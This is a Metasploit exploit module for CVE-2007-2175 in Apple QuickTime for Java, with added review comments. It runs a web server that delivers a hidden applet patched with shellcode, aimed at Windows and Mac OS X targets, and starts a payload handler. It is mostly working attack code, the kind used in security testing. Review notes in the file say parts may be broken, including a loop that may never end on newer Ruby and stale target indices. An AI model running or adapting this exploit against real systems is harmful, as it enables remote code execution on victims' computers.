Path: blob/master/modules/exploits/multi/browser/qtjava_pointer.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2007-2175 (Apple QuickTime for Java, toQTPointer()).
# It runs an HTTP server that serves a one-applet HTML page; the applet class
# bytes are read from the framework data directory in `exploit` and a copy is
# patched per request with a target selector byte and the encoded payload in
# `generate_applet` before being sent back.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  # Module metadata: name, references, payload constraints and the three
  # supported targets. 'Space' => 1024 matches the "1024 bytes for shellcode"
  # slot that generate_applet patches into the applet.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apple QTJava toQTPointer() Arbitrary Memory Access',
      'Description'    => %q{
          This module exploits an arbitrary memory access vulnerability in the
        Quicktime for Java API provided with Quicktime 7.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'hdm', # Original exploit for Mac OS X PPC / Win32
          'kf',  # Added support for Mac OS X X86
          'ddz'  # Discovered bug, provided tips
        ],
      'References'     =>
        [
          ['CVE', '2007-2175'],
          ['OSVDB', '34178'],
          ['BID', '23608'],
          ['ZDI', '07-023'],
        ],
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => ''
        },
      'Platform'       => %w{ win osx },
      'Targets'        =>
        [
          #
          # Problem with generic payloads + regenerate_payload still :(
          #
          # NOTE(review): on_request_uri's User-Agent branch indexes
          # self.targets[1..3], which assumes this commented-out entry still
          # occupies index 0. With it disabled, the list below starts at
          # index 0 with the Windows target, so those indices are stale
          # (the branch is unreachable while no target is named "Automatic").
          # [ 'Quicktime 7 Automatic',
          #   {
          #     'Platform' => ['win', 'osx'],
          #     'Arch'     => [ARCH_X86, ARCH_PPC]
          #   }
          # ],
          [ 'Quicktime 7 on Windows x86',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ],
          [ 'Quicktime 7 on Mac OS X PPC',
            {
              'Platform' => 'osx',
              'Arch'     => ARCH_PPC,
            }
          ],
          [ 'Quicktime 7 on Mac OS X x86',
            {
              'Platform' => 'osx',
              'Arch'     => ARCH_X86,
            }
          ],
        ],
      # 'DefaultTarget'  => 0,
      'DisclosureDate' => '2007-04-23'
    ))
  end


  # Loads the pre-built applet bytecode (QTJavaExploit.class) from the
  # framework data directory into @class_data, then hands off to super to
  # start the HTTP server. The file is read whole, in binary mode; it is
  # never modified here (generate_applet works on a dup).
  def exploit
    # load the class data
    path = File.join(Msf::Config.data_directory, "exploits", "QTJavaExploit.class")
    # NOTE(review): the handle is closed by hand with no ensure, so an
    # exception from read leaks it; the block form of File.open (or
    # File.binread) would close it on every path.
    fd = File.open(path, "rb")
    @class_data = fd.read(fd.stat.size)
    fd.close

    super
  end


  # HTTP request handler. Records the client in @targetcache (keyed by peer
  # address, with a last-seen timestamp), optionally picks a target from the
  # User-Agent when the selected target is named "Automatic", drops cache
  # entries idle for more than 60 seconds, and then either redirects to the
  # resource root, serves the applet-loading HTML, or serves the patched
  # applet for URIs ending in ".class" and starts the payload handler.
  #
  # @param cli the connected client; cli.peerhost is used as the cache key
  # @param req the parsed request; req.uri and req.headers are read
  def on_request_uri(cli, req)

    # Create a cached mapping between IP and detected target
    @targetcache ||= {}
    @targetcache[cli.peerhost] ||= {}
    @targetcache[cli.peerhost][:update] = Time.now.to_i

    # Only taken when the selected target's name contains "Automatic". No
    # such target is defined above (the entry is commented out), so this
    # block is currently dead code; see the index note in Targets.
    if (target.name =~ /Automatic/)
      case req.headers['User-Agent']
      when /Windows/i
        print_status("Choosing a Windows target")
        @targetcache[cli.peerhost][:target] = self.targets[1]
      when /PPC Mac OS X/i
        print_status("Choosing a Mac OS X PPC target")
        @targetcache[cli.peerhost][:target] = self.targets[2]
      when /Intel Mac OS X/i
        print_status("Choosing a Mac OS X x86 target")
        @targetcache[cli.peerhost][:target] = self.targets[3]
      end
    end

    # Clean the cache: collect addresses whose last update is more than 60
    # seconds old, then delete them in a second pass so the hash is not
    # mutated while it is being iterated.
    rmq = []
    @targetcache.each_key do |addr|
      if (Time.now.to_i > @targetcache[addr][:update]+60)
        rmq.push addr
      end
    end

    rmq.each {|addr| @targetcache.delete(addr) }


    # Request processing
    #
    # NOTE(review): both regexes below use `$`, which matches before a
    # trailing newline as well as at the end; `\z` anchors the true end of
    # the string. Harmless for ordinary request URIs, but worth confirming.

    if (not req.uri.match(/\.class$/i))

      # Redirect to the base directory so the applet code loads...
      # (the applet is referenced relatively from the HTML, so the page must
      # be served from a directory-style URI)
      if (not req.uri.match(/\/$/))
        send_redirect(cli, get_resource() + '/', '')
        return
      end

      # Display the applet loading HTML
      print_status("Sending HTML")
      send_response_html(cli, generate_html(), { 'Content-Type' => 'text/html' })
      return
    end

    # Send the actual applet over. generate_applet may return '' (Automatic
    # target with no detected client target); that empty body is sent as-is.
    print_status("Sending applet")
    send_response(cli, generate_applet(cli, req), { 'Content-Type' => 'application/octet-stream' })

    # Handle the payload
    handler(cli)
  end

  # Minimal page embedding a 1x1 applet whose code attribute points at
  # QTJavaExploit.class, relative to the current resource directory; the
  # browser's follow-up request for it ends in ".class" and is served by
  # on_request_uri.
  #
  # @return [String] the HTML document
  def generate_html()
    return "<html><head></head><body><applet width='1' height='1' code='QTJavaExploit.class'></applet></body></html>"
  end

  # Builds the applet bytes for one client: copies @class_data and patches in
  # the encoded payload for the client's target at the shellcode slot and a
  # one-byte selector at the target slot (1 = OSX PPC, 2 = OSX x86,
  # 3 = Windows x86). When the selected target is "Automatic" and nothing has
  # been detected for this client yet, returns '' instead.
  #
  # @param cli the client; used for the target cache and regenerate_payload
  # @param req unused in this method
  # @return [String] the patched class bytes, or '' (see above)
  def generate_applet(cli, req)

    this_target = nil
    if (target.name =~ /Automatic/)
      if (@targetcache[cli.peerhost][:target])
        this_target = @targetcache[cli.peerhost][:target]
      else
        return ''
      end
    else
      this_target = target
    end

    # make a copy..
    data = @class_data.dup

    # 1 = OSX PPC, 2 = OSX X86, 3 = WIN X86
    # Offsets of two marker byte sequences in the class data. NOTE(review):
    # String#index returns nil when a marker is absent and nothing checks for
    # that here, so a mismatched class file would surface as a NoMethodError
    # inside patch_bytecode (`off -= 1` on nil). The needles also contain
    # bytes above 0x7f in a source literal while @class_data was read in
    # binary mode; confirm the file's source encoding is binary-compatible
    # (no encoding magic comment is visible at the top of this file), or
    # index can raise Encoding::CompatibilityError.
    idx_targ = data.index("\x03\x10\xcc\x54")

    # 1024 bytes for shellcode
    idx_code = data.index("\x03\x10\xf0\x54")

    # Handle Mac OS X PPC
    # regenerate_payload is a framework helper; presumably it returns a
    # payload object whose encoded bytes are exposed as .encoded — confirm.
    if (this_target.arch.include?(ARCH_PPC))
      tp = regenerate_payload(cli, 'osx', ARCH_PPC, this_target)
      data = patch_bytecode(idx_code, data, tp.encoded)
      data = patch_bytecode(idx_targ, data, "\x01")
    end

    # Handle Mac OS X x86 / Windows x86
    if (this_target.arch.include?(ARCH_X86))

      if (this_target.platform.platforms.include?(Msf::Module::Platform::Windows))
        tp = regenerate_payload(cli, 'win', ARCH_X86, this_target)
        data = patch_bytecode(idx_code, data, tp.encoded)
        data = patch_bytecode(idx_targ, data, "\x03")
      end

      if (this_target.platform.platforms.include?(Msf::Module::Platform::OSX))
        tp = regenerate_payload(cli, 'osx', ARCH_X86, this_target)
        data = patch_bytecode(idx_code, data, tp.encoded)
        data = patch_bytecode(idx_targ, data, "\x02")
      end
    end

    return data
  end

  # Writes each byte of buff into data, starting at off and advancing to the
  # next position that sits between a 0x10 byte and a 0x54 byte for each
  # successive byte (presumably the operand of consecutive bipush/bastore
  # pairs that fill a byte array in the applet — verify against
  # QTJavaExploit.class). data is modified in place and also returned.
  #
  # @param off  [Integer] starting offset (a value found by String#index)
  # @param data [String]  class bytes, mutated in place
  # @param buff [String]  bytes to write, one per matching slot
  # @return [String] data
  #
  # NOTE(review): `data[off-1] == 0x10` compares the result of String#[]
  # with an Integer. That is Ruby 1.8 byte semantics; on Ruby 1.9+
  # String#[Integer] returns a one-character String (or nil past the end),
  # so the comparison never holds and the inner loop does not terminate
  # (String#getbyte is the byte-level accessor on newer Rubies). Confirm
  # against the Ruby version the framework runs on. Neither loop is
  # bounds-checked against data.length either.
  def patch_bytecode(off, data, buff)

    cnt = 0
    off -= 1
    while (cnt < buff.length)
      cnt += 1
      while (! (data[off-1] == 0x10 && data[off+1] == 0x54))
        off += 1
      end
      data[off]=buff[cnt-1]
      off += 1
    end

    return data
  end


end